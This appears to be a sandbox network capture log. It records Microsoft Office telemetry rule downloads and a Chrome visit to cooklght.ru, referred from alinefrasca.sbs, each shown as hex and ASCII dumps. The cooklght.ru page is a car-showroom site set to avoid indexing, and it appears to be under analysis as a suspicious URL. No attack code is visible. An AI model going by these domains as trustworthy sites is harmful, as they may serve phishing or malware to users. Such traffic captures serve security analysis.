                                                                            2024-10-28 08:37:02 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            36192.168.2.44979713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:02 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:02 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:02 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 408
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                            x-ms-request-id: c3a6d21e-601e-00ab-1dc6-2766f4000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083702Z-17c5cb586f6r59nt869u8w8xt800000003ug0000000016uv
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:02 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            37192.168.2.44979513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:02 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:02 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:02 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 450
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                            ETag: "0x8DC582BD4C869AE"
                                                                            x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083702Z-16849878b78bjkl8dpep89pbgg00000003k0000000001ykk
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:02 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.449799104.21.91.1454431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:03 UTC696OUTGET // HTTP/1.1
                                                                            Host: cooklght.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-User: ?1
                                                                            Sec-Fetch-Dest: document
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:03 UTC844INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:03 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.3.33
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbKR8%2FCE3MO9nSlNAEj%2Bfpn9k7c%2FZinUmtbUNGF8G9l9exwoIb3DV0CKSj2Sgtm0Lkv8ld9BE81ncm8uyqQXCwJvbK19eqkk7cJ7IzEDTYwJuLBmALXJuivAJ9%2F9aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999a072c132d3e-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1071&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1274&delivery_rate=2487972&cwnd=251&unsent_bytes=0&cid=1686d85445ec394f&ts=467&x=0"
                                                                            2024-10-28 08:37:03 UTC525INData Raw: 31 64 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 64 72 65 6e 61 6c 69 6e 65 20 52 75 73 68
                                                                            Data Ascii: 1d34<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noarchive, nosnippet, noindex, nofollow"> <title>Adrenaline Rush
                                                                            2024-10-28 08:37:03 UTC1369INData Raw: 0a 0d 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 62 67 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 66 77 2d 62 6f 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6f 6b 6c 67 68 74 2e 72 75 2f 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 22 3e 3c 2f 69 3e 20 41 64 72 65 6e 61 6c 69 6e 65 20 52 75 73 68 20 4d 6f 74 6f 72 73 70 6f 72 74 73 20 2d 20 41 75 74 6f 53 68 6f 77 72 6f 6f 6d 0d
                                                                            Data Ascii: <nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top"> <div class="container"> <a class="navbar-brand fw-bold" href="https://cooklght.ru//"> <i class="fas fa-car"></i> Adrenaline Rush Motorsports - AutoShowroom
                                                                            2024-10-28 08:37:03 UTC1369INData Raw: 78 59 6b 48 48 69 41 48 61 46 47 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 35 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 34 20 66 77 2d 62 6f 6c 64 22 3e 44 69 73 63 6f 76 65 72 20 59 6f 75 72 20 4e 65 78 74 20 43 61 72 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 72 6f 61 64 20 6d 61 79 20 62 65 20 6c 6f 6e 67 2c 20 62 75 74 20 74 68 65 20 6a 6f 75 72 6e 65 79 20 69 73 20 77 6f 72 74 68 20 69 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66
                                                                            Data Ascii: xYkHHiAHaFG') no-repeat center; background-size: cover;"> <div class="container py-5"> <h1 class="display-4 fw-bold">Discover Your Next Car</h1> <p class="lead">The road may be long, but the journey is worth it.</p> <a href
                                                                            2024-10-28 08:37:03 UTC1369INData Raw: 74 65 78 74 2d 63 65 6e 74 65 72 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 6f 6b 6c 67 68 74 2e 72 75 2f 2f 23 69 6e 76 65 6e 74 6f 72 79 27 20 63 6c 61 73 73 3d 27 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 73 6d 27 3e 3c 69 20 63 6c 61 73 73 3d 27 66 61 73 20 66 61 2d 69 6e 66 6f 2d 63 69 72 63 6c 65 27 3e 3c 2f 69 3e 20 56 69 65 77 20 44 65 74 61 69 6c 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                            Data Ascii: text-center'> <a href='https://cooklght.ru//#inventory' class='btn btn-primary btn-sm'><i class='fas fa-info-circle'></i> View Details</a> </div> </div> </div>
                                                                            2024-10-28 08:37:03 UTC1369INData Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 20 64 69 73 70 6c 61 79 2d 36 20 66 77 2d 62 6f 6c 64 20 6d 62 2d 34 22 3e 4f 75 72 20 53 65 72 76 69 63 65 73 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 74 6f 6f 6c 73 20 64 69 73 70 6c 61 79 2d 36 22 3e 3c
                                                                            Data Ascii: ound-color: #333;"> <div class="container"> <h2 class="text-center display-6 fw-bold mb-4">Our Services</h2> <div class="row text-center"> <div class="col-md-4 mb-4"> <i class="fas fa-tools display-6"><
                                                                            2024-10-28 08:37:03 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 72 6f 77 73 3d 22 34 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 4d 65 73 73 61 67 65 22 20 72 65 71 75 69 72 65 64 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                            Data Ascii: <input type="email" class="form-control" placeholder="Email" required> </div> <div class="col-12"> <textarea class="form-control" rows="4" placeholder="Message" required></textarea> </div>
                                                                            2024-10-28 08:37:03 UTC114INData Raw: 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                            Data Ascii: fasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body></html>
                                                                            2024-10-28 08:37:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            39192.168.2.44980113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:03 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:03 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:03 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 474
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                            ETag: "0x8DC582B9964B277"
                                                                            x-ms-request-id: 32193d61-901e-0015-09ca-27b284000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083703Z-r197bdfb6b4d9xksru4x6qbqr000000004ug000000001b0k
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:03 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            40192.168.2.44980413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:03 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:03 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:03 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 467
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                            ETag: "0x8DC582BA6C038BC"
                                                                            x-ms-request-id: e84b733d-701e-005c-1bb8-26bb94000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083703Z-16849878b78zqkvcwgr6h55x9n00000004a0000000001tnd
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:03 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            41192.168.2.44980213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:03 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:03 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:03 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 415
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                            ETag: "0x8DC582B9F6F3512"
                                                                            x-ms-request-id: 633f9008-101e-00a2-3e9b-279f2e000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083703Z-16849878b7898p5f6vryaqvp5800000005k000000000a277
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            42192.168.2.44980513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:03 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:03 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:03 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 471
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                            ETag: "0x8DC582BB10C598B"
                                                                            x-ms-request-id: c60d5dca-401e-005b-2742-279c0c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083703Z-17c5cb586f6g6g2sbe6edp75y400000006sg000000007apc
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:03 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            43192.168.2.44980313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
